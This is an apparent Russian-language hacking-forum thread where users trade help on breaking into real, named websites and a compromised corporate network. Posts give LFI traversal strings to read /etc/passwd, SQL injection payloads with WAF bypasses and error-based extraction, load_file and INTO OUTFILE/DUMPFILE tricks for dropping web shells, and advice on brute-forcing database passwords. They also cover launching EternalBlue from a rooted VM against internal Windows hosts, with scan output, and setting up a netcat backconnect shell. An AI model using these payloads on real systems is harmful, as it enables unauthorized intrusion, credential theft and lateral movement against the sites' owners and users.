с чего вы решили, что она раскручивабельна?

ACat said:
↑ (https://antichat.live/posts/4095057/)
с чего вы решили, что она раскручивабельна?


всмысле??

sepo said:
↑ (https://antichat.live/posts/4095065/)
всмысле??


там нету иньекции, там есть ошибка от спец-символа.

логика не срабатывает.

http://www.salaamsombank.com/pages.php?id=(1) (http://www.salaamsombank.com/pages.php?id=%281%29)

подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести

file.php?url=site.com%00 на такой запрос выдает ошибку

Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23


PHP:

на сколько я понимаю - url=../../../etc/passwd%00

url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00

при условии, что функция basename() нам ничего не портит.

file.php?url=../../../etc/passwd%00

Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

http://www.php.su/functions/?basename


Code:


то бишь вектор сужается до дириктории, из которой выполняется сценарий.

swat_ said:
↑ (https://antichat.live/posts/4095816/)
подскажите пожалуйста есть ли в этом коде уязвимость


Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.

Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:

Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.phpпроверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее

всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?

IvanPa said:
↑ (https://antichat.live/posts/4095994/)
всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?


Для начала скажите какую платформу вы используете.

В зависимости от этого можно будет обрисовать потенциальные уязвимости.

Опаснотсть представляют не чаты, опасность представляют упущения в коде.

А за небольшую сумму проведу black box + white box аудит с подробным отчетом.

Что можно сделать тут?


Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092

DezMond™ said:
↑ (https://antichat.live/posts/4096042/)
Что можно сделать тут?

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092



SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1

Host: www.rapibus.sto.ca (http://www.rapibus.sto.ca)

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie:

Connection: close

Content-Length: 0

ACat said:
↑ (https://antichat.live/posts/4096088/)
SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1
Host:
www.rapibus.sto.ca (http://www.rapibus.sto.ca)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie:
Connection: close
Content-Length: 0


и чего ты добился? Боюсь спросить, с чего ты скопировал?

DezMond™ said:
↑ (https://antichat.live/posts/4096090/)
и чего ты добился? Боюсь спросить, с чего ты скопировал?


обошел ваф. из бурпа.

BabaDook said:
↑ (https://antichat.live/posts/4096089/)
Ух ты, как ты это сделал?


ssu

мне бы наставника

скорее так себе маркетолог

я могу аудировать лишь пхп платформу из веб платформ

и владею не всеми критикал уязвимостями

кстати, https://ru.wikipedia.org/wiki/HTTP тут этого почему-то нету

из веб платформ

имеется в виду, что ASP/JSP для меня ХЗ...

>чего там нету ?

SERVER

BabaDook said:
↑ (https://antichat.live/posts/4096106/)
asp не веб, согласен.
И вправду, нету, напиши им репорт, пускай добавит(исправит багу)


это приват, ёпт) зеродей))

блек-хэт рулез и все такое

А ещё там нету:


Code:
BLABLABLA /index.php?id=5 HTTP/1.1
Host: www.rapibus.sto.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close


Весь веб не охватишь, сервис может быть написан на чём угодно, например https://habrahabr.ru/post/318916/.

crlf said:
↑ (https://antichat.live/posts/4096109/)
А ещё там нету:

Code:
BLABLABLA /index.php?id=5 HTTP/1.1
Host: www.rapibus.sto.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close

Весь веб не охватишь, сервис может быть написан на чём угодно, например
https://habrahabr.ru/post/318916/
.


ти! ти сломал мой зеродей, злодэй)

а на счёт asp он что, не уязвим? типа как линукс относительно винды asp относительно php?

ACat said:
↑ (https://antichat.live/posts/4096113/)
а на счёт asp он что, не уязвим? типа как линукс относительно винды asp относительно php?


Как-то так

http://s03.radikal.ru/i176/1706/2f/e5159869808b.png (http://radikal.ru)

crlf said:
↑ (https://antichat.live/posts/4096115/)
Как-то так
https://i.imgur.com/nVk8zpr.png


ознакомимся, спасибо

картиночка смешная)

но я про реальное добывание профита веду речь.

Дело в том, профит-то надо добывать, семью кормить. В ЮА обьяснить дяде из 90-х что ему нужно безопасность за косарь грина - трудно.

Взломаешь, дефейснешь - с бэкапа востановят. 10 раз дефейснешь - 10 раз востановят.

С каждым днем все переходят на фреймворки, где багов либо нет, либо их найти крайне трудно, эксплуатировать - ещё труднее.

В общем я о том, что поле с хлебом сужается, камней становится больше, а серп все тот же, что в 2007, или когда там Dr.Z3r0 писал фак по мускулу

DezMond™ said:
↑ (https://antichat.live/posts/4096042/)
Что можно сделать тут?

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092



Ни у кого не получилось раскрутить? только тайм бэйс?

Доброго времени суток! Какие есть способы обойти фильтр на _ (нижнее подчеркивание) в sql-inj?

Фильтр в имени таблицы обошел, как обойти в названии колонки?

на запрос (select+table_name+FROM+(SELECT+0x696E666F726D6174 696F6E5F736368656D612E7461626C6573)%20AS%20t2) отвечает:


...syntax to use near 'table\_name'....


%5f и %255f не проходит

aka PSIH said:
↑ (https://antichat.live/posts/4098430/)
Доброго времени суток! Какие есть способы обойти фильтр на _ (нижнее подчеркивание) в sql-inj?
Фильтр в имени таблицы обошел, как обойти в названии колонки?
на запрос (select+table_name+FROM+(SELECT+0x696E666F726D6174 696F6E5F736368656D612E7461626C6573)%20AS%20t2) отвечает:
%5f и %255f не проходит


не, так тоже не получится


Code:
> select table_name FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73)t1 limit 1;
Unknown column 'table_name' in 'field list'

t0ma5 said:
↑ (https://antichat.live/posts/4098440/)
не, так тоже не получится

Code:
> select table_name FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73)t1 limit 1;
Unknown column 'table_name' in 'field list'



У меня такой запрос проходит, инфу из колонок где нет "_" в имени выводит нормально.

Вопрос как обойти фильтр на "_"

aka PSIH said:
↑ (https://antichat.live/posts/4098479/)
У меня такой запрос проходит, инфу из колонок где нет "_" в имени выводит нормально.
Вопрос как обойти фильтр на "_"


хм вроде не должно оно так работать

попробуй ради интереса вывести инфу из таблицы COLUMNS колонку например PRIVILEGES(там должно быть 'select' 'insert' etc), если к таблицам доступ таки есть, то можно подумать

t0ma5 said:
↑ (https://antichat.live/posts/4098481/)
хм вроде не должно оно так работать
попробуй ради интереса вывести инфу из таблицы COLUMNS колонку например PRIVILEGES(там должно быть 'select' 'insert' etc), если к таблицам доступ таки есть, то можно подумать


Этот способ я в этой же теме нашел доступ к таблицам есть

aka PSIH said:
↑ (https://antichat.live/posts/4098486/)
Этот способ я в этой же теме нашел
доступ к таблицам есть


так данные выводятся или нет)?

дай линк на способ, хочу посмотреть, в теме 100 страниц

t0ma5 said:
↑ (https://antichat.live/posts/4098488/)
так данные выводятся или нет)?
дай линк на способ, хочу посмотреть, в теме 100 страниц


Способ очень прост ,допустим мы знаем что есть таблица "_"users ,мы можешь предположить что там есть колонки email,pass ,информацию сразу из них надо выводить

на примере мепа -D bblalala -T "_"users --columns

[QUOTE="Xsite"]
Xsite said:
↑ (https://antichat.live/posts/4098490/)
Способ очень прост ,допустим мы знаем что есть таблица "_"users ,мы можешь предположить что там есть колонки email,pass ,информацию сразу из них надо выводить
на примере мепа -D bblalala -T "_"users --columns

t0ma5 said:
↑ (https://antichat.live/posts/4098488/)
так данные выводятся или нет)?
дай линк на способ, хочу посмотреть, в теме 100 страниц


в этом посте подсмотрел /threads/46016/page-1105#post-3472979 (https://antichat.live/threads/46016/page-1105/)

еще раз, данные выводятся, НО только из тех колонок у которых в имени нету "_".

Этим способом мне удалось обойти фильтрацию "_" в имени таблицы, но чтобы вытащить нужные данные необходимо обойти фильтрацию "_" в имени колонки!

aka PSIH said:
↑ (https://antichat.live/posts/4098515/)
в этом посте подсмотрел
/threads/46016/page-1105#post-3472979 (https://antichat.live/threads/46016/page-1105/)
еще раз, данные выводятся, НО только из тех колонок у которых в имени нету "_".
Этим способом мне удалось обойти фильтрацию "_"
в имени таблицы,
но чтобы вытащить нужные данные необходимо обойти фильтрацию "_"
в имени колонки
!


ну ок, выводятся дак выводятся) хотя я всё равно не верю, мне кажется ты не проверял


Code:
> SELECT * FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73) AS t2;
+------------------------------------------------------+
| 0x696E666F726D6174696F6E5F736368656D612E7461626C65 73 |
+------------------------------------------------------+
| information_schema.tables |
+------------------------------------------------------+
1 row in set (0.00 sec)

не чует мускул таблицу в таком виде, from не eval, на лету данные не конвертит

запрос через get идёт? post'ом пробовал отправлять?

Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть), но указывать пути не могу по причине того, что не работает флеш ( INTO OUTFILE "путь/до/шелла")

Что посоветуете ?

hex encode

ms13 said:
↑ (https://antichat.live/posts/4100087/)
hex encode


В INTO OUTFILE "путь/до/шелла"

не получится хексить путь.

Если слеш режется - заливка через into outfile обламывается.

Путь должен быть написан так, как его понимает система.

На винде можно пробовать обратный слеш - "\".

Что делать фильтруются двоиные кавычки


Code:
value=""alert(1)"

its very good service thank you for thhis.

Почему так высок спрос на МД5? Как бэ уже давно устарел, даже SHA1 уже не рекомендован.

Более того не понимаю почему народ не делает RAINBOW сервер? Он же легко делается

как стать хакером ?

BabaDook said:
↑ (https://antichat.live/posts/4101785/)
как стать хакером ?


укради перчатку хакермана

https://pbs.twimg.com/profile_images/734418047042228226/yPvtvPiQ.jpg

залился на сервак, повысился до рута, я в линуксе запущеном на vmware.

Сетка компании, в сетке есть пару виндовых машин и пару виртуалок на них.

Как атаковать сетку?? Как запустить ентерналблу и натравить его на винду с виртуалки?

Может можно как-то пробросить трафик с моей машины в их сеть, что бы не поднимать на чужём ОС своё обладнення?

спасибо

Глянь как опознаются машины в сети - ip/mask & mac.

Можешь замаскироваться за виндовую машину, только тебе можен помешать сетевая техника

Добрый,

подскажите, есть ли здесь sql-injection и как её раскрутить, как тока не пробовал ничего не берет, sqlmap глухо с разными тамперами((

.SpoilerTarget" type="button">Spoiler: site
mmosoc275.2x.mmosolution.com/admin/index.php?route=ticket/ticket&token=j29jGuAj6LSZYPBNeBl94dEidP92Kdvc&sort=email&order=DESC

Логин/Пароль: demo

Параметр: sort

y-es said:
↑ (https://antichat.live/posts/4102111/)
Глянь как опознаются машины в сети - ip/mask & mac.
Можешь замаскироваться за виндовую машину, только тебе можен помешать сетевая техника


ifconfig

eth0 Link encap:Ethernet HWaddr 52:54:00:85:E5:01

inet addr:192.168.1.52 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::5054:ff:fe85:e501/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:50029039 errors:0 dropped:209 overruns:0 frame:0

TX packets:26546699 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:314731670 (300.1 MiB) TX bytes:1387961011 (1.2 GiB)

Interrupt:10 Base address:0xe000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:104853 errors:0 dropped:0 overruns:0 frame:0

TX packets:104853 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:21969819 (20.9 MiB) TX bytes:21969819 (20.9 MiB)


Nmap scan report for 2.corp (192.168.1.2)
Host is up (0.0039s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh Cisco SSH 1.25 (protocol 2.0)
23/tcp open telnet Cisco router
80/tcp open http Cisco IOS http config
443/tcp open ssl/http Cisco IOS http config
MAC Address: 28:94:0F:4F:00:C7 (Unknown)
Device type: switch
Running: Cisco IOS 12.X
OS details: Cisco 2950, 2960, 3550, 3560, or 3750 switch (IOS 12.1 - 12.2)
Network Distance: 1 hop
Service Info: OS: IOS; Device: router
Nmap scan report for 3.corp (192.168.1.36)
Host is up (0.00068s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
80/tcp open http Microsoft IIS httpd 7.5
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open ssl/http Microsoft IIS httpd 7.5
445/tcp open netbios-ssn
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
3268/tcp open ldap
3269/tcp open ssl/ldap
3389/tcp open microsoft-rdp Microsoft Terminal Service
6129/tcp open unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC

Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?

danil911 said:
↑ (https://antichat.live/posts/4102611/)
Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?


Если в качестве БД используется MySQL (или форки) - то чисто средствами мускула не получится.

Проще смотреть в админке, есть ли заливка или выполнения кода (в шаблонах к примеру).

Или читать скрипты сайта, искать другие уязвимости, типа LFI, RCE, заливки (попутно могут обозначиться сторонние скрипты с известными багами).

danil911 said:
↑ (https://antichat.live/posts/4102611/)
Снова поднимается вопрос про шелл, найдена скуля со stacked queries, т.е могу делать insert update delete и.т.д, работает, но интересует не добавления себя в админы, а конкретно залитие шелла при помощи sql команды, знак слеша " / " фильтруется и при помощи хекса не робит, есть такая возможность ?


можно обойти WAF или попробовать подкдючиться к серверу сбрутив пароли из mysql.user

если скуля в GET попробуй POST/HEADER/BLABLALBA1212

ACat said:
↑ (https://antichat.live/posts/4102655/)
можно обойти WAF или попробовать подкдючиться к серверу сбрутив пароли из mysql.user
если скуля в GET попробуй POST/HEADER/BLABLALBA1212


Пробовал обойти waf, юзая тамперы и смотря на ф-и вроде charencode и.т.д, не вышло, а касательно подключиться к серверу, сбрутил пароли из юзера, это уже сделано, но ,как я понимаю, для подключения нужно чтобы был открыт 3306 порт мускульный ? Nmap говорит, что нету.


dooble said:
↑ (https://antichat.live/posts/4102649/)
Если в качестве БД используется MySQL (или форки) - то чисто средствами мускула не получится.
Проще смотреть в админке, есть ли заливка или выполнения кода (в шаблонах к примеру).
Или читать скрипты сайта, искать другие уязвимости, типа LFI, RCE, заливки (попутно могут обозначиться сторонние скрипты с известными багами).


С админкой странный облом, я давно сбрутил хеш, да и к тому же могу сам себя внести как админа (insert into, update и.т.д), но найдя админку и зайдя во внутрь...происходит просто редирект на главную сайта, никаких новых способностей и ф-ий не появляется, хз почему так реализовано )

danil911 said:
↑ (https://antichat.live/posts/4102674/)
С админкой странный облом, я давно сбрутил хеш, да и к тому же могу сам себя внести как админа (insert into, update и.т.д), но найдя админку и зайдя во внутрь...происходит просто редирект на главную сайта, никаких новых способностей и ф-ий не появляется, хз почему так реализовано )


Читать скрипты (и .htaccess) и разбираться.

load_file().

он же сказал, что фильтруется слэш.

Ищи админку. ищи другую админку. ищи какие-то интерфейсы на суб-доменах. заюзай dnsenum с нормальным словарём.

но мне кажется это гонево что фильтруется слэш

ACat said:
↑ (https://antichat.live/posts/4102708/)
он же сказал, что фильтруется слэш.


Не вводи в заблуждение,

into outfile '/patch/file' требует "натуральный" слеш,

а load_file(0x2F6574632F706173737764) вполне читает '/etc/passwd'.

Так что, если у мускула есть права на чтение файлов сайта, то посмотреть исходники будет полезно.

ух ты, плюсик

http://www.cvedetails.com/cve/CVE-2013-1862/

Не пойму как использовать,можете подсказать?

Есть уязвимый сайт.

Через /download.php можно скачивать файлы,скачал passwd,но там все на X закрыто пароли.

Есть на сайте файл config.php.Можно ли с помощью данной уязвимости скачать его и как ?

Mexel said:
↑ (https://antichat.live/posts/4103485/)
http://www.cvedetails.com/cve/CVE-2013-1862/ (https://www.cvedetails.com/cve/CVE-2013-1862/)
Не пойму как использовать,можете подсказать?


На сколько я понимаю, это атака не на сервер, а на пользователя который будет просматривать ядовитый лог. В следствии чего, из-за внедрённых последовательностей, в его терминале может исполниться произваольный код.


SaNDER said:
↑ (https://antichat.live/posts/4103490/)
Есть уязвимый сайт.
Через /download.php можно скачивать файлы,скачал passwd,но там все на X закрыто пароли.
Есть на сайте файл config.php.Можно ли с помощью данной уязвимости скачать его и как ?


В passwd пароли не хранятся, они в лежат в shadow. Права на чтение есть только у рута. Если можно просмаривать /etc/passwd или /etc/fstab,а config.php или другие php файлы нет, значит там инклуд. Иначе, нужно подобрать или найти путь до конфига.

crlf said:
↑ (https://antichat.live/posts/4103506/)
На сколько я понимаю, это атака не на сервер, а на пользователя который будет просматривать ядовитый лог. В следствии чего, из-за внедрённых последовательностей, в его терминале может исполниться произваольный код.
В
passwd
пароли не хранятся, они в лежат в
shadow
. Права на чтение есть только у рута. Если можно просмаривать
/etc/passwd
или
/etc/fstab,
а
config.php
или другие php файлы нет, значит там инклуд. Иначе, нужно подобрать или найти путь до конфига.


Я уже не знаю как эту уязвимость то и использовать.

К тому же путь до конфига я не знаю.

SaNDER said:
↑ (https://antichat.live/posts/4103517/)
Я уже не знаю как эту уязвимость то и использовать.
К тому же путь до конфига я не знаю.


Не подскажешь как быть хакером ?

SaNDER said:
↑ (https://antichat.live/posts/4103517/)
К тому же путь до конфига я не знаю.


Искать раскрытие путей, phpinfo, проверить дефолтные пути CMS, брут и так далее.


BabaDook said:
↑ (https://antichat.live/posts/4103518/)
Не подскажешь как быть хакером ?


Изи /threads/453193/ (https://antichat.live/threads/453193/)

Пойду админшу топтать

SaNDER said:
↑ (https://antichat.live/posts/4103517/)
Я уже не знаю как эту уязвимость то и использовать.
К тому же путь до конфига я не знаю.


можно пробрутить дефолтные конфиги, предварительно пробрутив папки на самом серваке дирбастером.

потом найти парлоли к БД или к ФТП

Самый простой совет забыл


SaNDER said:
↑ (https://antichat.live/posts/4103490/)
Через /download.php можно скачивать файлы,скачал passwd,


Если там читалка, прочитай download.php или любой другой и посмотри что инклудится в них. В одном из них должен быть конфиг.

Я скачал и файл Download.php и Config.php .

Логин и пароль от БД есть,порт на сайте 3306 есть,как через kali законнектится ?

P.S -- Нашёл в директория /pma там можно было зайти в БД,зашёл и нашёл таблицу users,но её почему то не открывает(404 ошибка reg.ru),хотя когда мышкой на таблицу наводишь показывает : Browse: (4 Rows) .

Да и вообще с любой колонкой,таблицой так .

Вот код download.php


Code:

SaNDER said:
↑ (https://antichat.live/posts/4103602/)
Я скачал и файл Download.php и Config.php .
Логин и пароль от БД есть,порт на сайте 3306 есть,как через kali законнектится ?
P.S -- Нашёл в директория /pma там можно было зайти в БД,зашёл и нашёл таблицу users,но её почему то не открывает(404 ошибка reg.ru),хотя когда мышкой на таблицу наводишь показывает : Browse: (4 Rows) .
Да и вообще с любой колонкой,таблицой так .
Вот код download.php

Code:




так если ты в ПМА, от какого ты юзера, есть ли у юзера файл прив? Если да - лей шелл.

Какая версия самого ПМА установлена? ПМА тоже бывают с багами.

Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?

Бурп пометил как критикал

ACat said:
↑ (https://antichat.live/posts/4103725/)
Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?
Бурп пометил как критикал


Ты хакер?

ACat said:
↑ (https://antichat.live/posts/4103725/)
Парни, если в гет или пост запросе к серверу идут серилизированные данные - является ли это уязвимостью?


Зависит от ЯП и контекста.

Существует какая-либо уязвимость для phpmyadmin 4.0.10.15?

ACat said:
↑ (https://antichat.live/posts/4103633/)
так если ты в ПМА, от какого ты юзера, есть ли у юзера файл прив? Если да - лей шелл.
Какая версия самого ПМА установлена? ПМА тоже бывают с багами.


Там PMA не так выглядит как обычно,будто бы не полноценная,чисто одним текстом и версия не указана.Нашёл файл phpMyAdmin.spec

И если там не вранье,то версия 2.8.0


Code:
%define _myadminpath /var/www/myadmin
%define pkgrelease rc1
%define microrelease 1

Name: phpMyAdmin
Version: 2.8.0
Release: %{pkgrelease}.%{microrelease}
License: GPL
Group: Applications/Databases/Interfaces
Source0: http://prdownloads.sourceforge.net/phpmyadmin/%{name}-%{version}-%{pkgrelease}.tar.bz2
Source1: phpMyAdmin-http.conf
URL: http://sourceforge.net/projects/phpmyadmin/
Requires: mysql
Requires: php-mysql
Buildarch: noarch
BuildRoot: %{_tmppath}/%{name}-root

Summary: phpMyAdmin - web-based MySQL administration

Нашёл файл swekey.sample-1.conf.

Там нашёл это :


Code:
0000000000000000000000000000763A:root
000000000000000000000000000089E4:steve
0000000000000000000000000000231E:scott

https://www.cvedetails.com/cve/CVE-2016-5239/

Нужен PoC.

Mexel said:
↑ (https://antichat.live/posts/4103739/)
Существует какая-либо уязвимость для phpmyadmin 4.0.10.15?


Список публичных уязвимостей phpMyAdmin с 2001 года по сей день.

http://www.cvedetails.com/product/1341/?q=Phpmyadmin

Приватные уязвимости вряд ли кто станет палить)

pma/Documentation.html помоему. или знак вопроса на форме входа.


SaNDER said:
↑ (https://antichat.live/posts/4103773/)
Там PMA не так выглядит как обычно,будто бы не полноценная,чисто одним текстом и версия не указана.Нашёл файл phpMyAdmin.spec
И если там не вранье,то версия 2.8.0

Code:
%define _myadminpath /var/www/myadmin
%define pkgrelease rc1
%define microrelease 1

Name: phpMyAdmin
Version: 2.8.0
Release: %{pkgrelease}.%{microrelease}
License: GPL
Group: Applications/Databases/Interfaces
Source0: http://prdownloads.sourceforge.net/phpmyadmin/%{name}-%{version}-%{pkgrelease}.tar.bz2
Source1: phpMyAdmin-http.conf
URL: http://sourceforge.net/projects/phpmyadmin/
Requires: mysql
Requires: php-mysql
Buildarch: noarch
BuildRoot: %{_tmppath}/%{name}-root

Summary: phpMyAdmin - web-based MySQL administration

Нашёл файл swekey.sample-1.conf.
Там нашёл это :

Code:
0000000000000000000000000000763A:root
000000000000000000000000000089E4:steve
0000000000000000000000000000231E:scott



http://0day.today/search?search_request=phpmyadmin

в sql-inj фильтруется слово OUTFILE. привилегии есть, иначе бы и спрашивать не стал. как поступить ?

- конструкция /**/ внутри не работает, как и %0b, как и + и пробел.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105379/)
в sql-inj фильтруется слово OUTFILE.


Вывод, пожалуйста

н


exT1ma4ka said:
↑ (https://antichat.live/posts/4105379/)
в sql-inj фильтруется слово OUTFILE. привилегии есть, иначе бы и спрашивать не стал. как поступить ?
- конструкция /**/ внутри не работает, как и %0b, как и + и пробел.


нахуя оно тебе ?

SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105570/)
SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.


'INTO OUTFILE' hex не воспринимает, недавно же это писали

t0ma5 said:
↑ (https://antichat.live/posts/4105571/)
'INTO OUTFILE' hex не воспринимает


пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105580/)
пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.


если это тот же сайт, на котором даже урлдекода нет, но сомневаюсь что оно фильтруется, скорее всего прав на запись не хватает, проверь вообще работает ли оно(в /tmp по дефолту запись есть у всех)


Code:
select 'test' from(select 1)x INTO OUTFILE '/tmp/qqq'
select load_file('/tmp/qqq')

если не работает, то забить на этот вектор, искать другое

хз ещё как апач/etc настроен, файл если и создастся - то из под юзера мускул, не факт что будет работать

t0ma5 said:
↑ (https://antichat.live/posts/4105584/)
если это тот же сайт, на котором даже урлдекода нет


нет. на том нет mysql привилегий на запись, сейчас говорю о другом. и в данном случае ' фильтруются, поэтому приходится в hex переводить.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105596/)
нет. на том нет mysql привилегий на запись, сейчас говорю о другом. и в данном случае ' фильтруются, поэтому приходится в hex переводить.


hex не катит, читай файлы сайта, может что интересное встретится

exT1ma4ka said:
↑ (https://antichat.live/posts/4105570/)
SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.


Есть ещё пару вариантов, хотя с 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 нету вариантов, жаль

t0ma5 said:
↑ (https://antichat.live/posts/4105599/)
hex не катит, читай файлы сайта, может что интересное встретится


вывода нет, только error based. типа:


Code:
OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))--



Code:
OR ExtractValue(1,concat(0x5c,(VERSION())))--

в них файл не отображается, просто страница грузится в рабочем режиме.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105601/)
вывода нет, только error based. типа:

Code:
OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))--


Code:
OR ExtractValue(1,concat(0x5c,(VERSION())))--

в них файл не отображается, просто страница грузится в рабочем режиме.


error-based тоже вывод)

чтение файла можно и через boolean проверить конструкцией length(load_file('/etc/shells'))>0 , ну так, может когда пригодится

файл кстати какой читал? может там open_basedir, если докрут известен - попробуй index.php прочитать

читай конфиги сервера, ищи полный путь до сайта, читай конфиги сайта (возможно есть пхпмайадмин), может на соседних сайтах есть пхпмайадмин, записывай через пыху шелл, может возможно удаленное подключение к мускулю.

пути известны.


t0ma5 said:
↑ (https://antichat.live/posts/4105611/)
файл кстати какой читал?


/../../public_html/configuration.php (joomla)


t0ma5 said:
↑ (https://antichat.live/posts/4105611/)
length(load_file('/etc/shells'))>0


результат не виден. просто рабочая страница. даже если имя файла в запросе изменить на неправильное.

но опять таки, внутри LOAD_FILE(тут) - мне приходится конструкцию с путями и кавычками писать в hex, ибо ' фильтруются.

exT1ma4ka said:
↑ (https://antichat.live/posts/4105580/)
пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.


Вместо INTO OUTFILE можно использовать INTO DUMPFILE.

Такой вопрос, пытаюсь поднять backconnect ,но не работает ни С и perl python скрипты, то есть 0 на массу при попытке соединения, но если пробую через php скрипт соединения появлсятся и сразу пропадает , netcat ставлю с таками параметрами -lvnp 443 -lvp 443 ( пробовал разные порты, смотрел какие порты открыты на сервере), но всеравно результат один и тот же, соединение появляется и сразу netcat вылетает. В какую сторону копать?

Вот модули что есть на серве


Code:
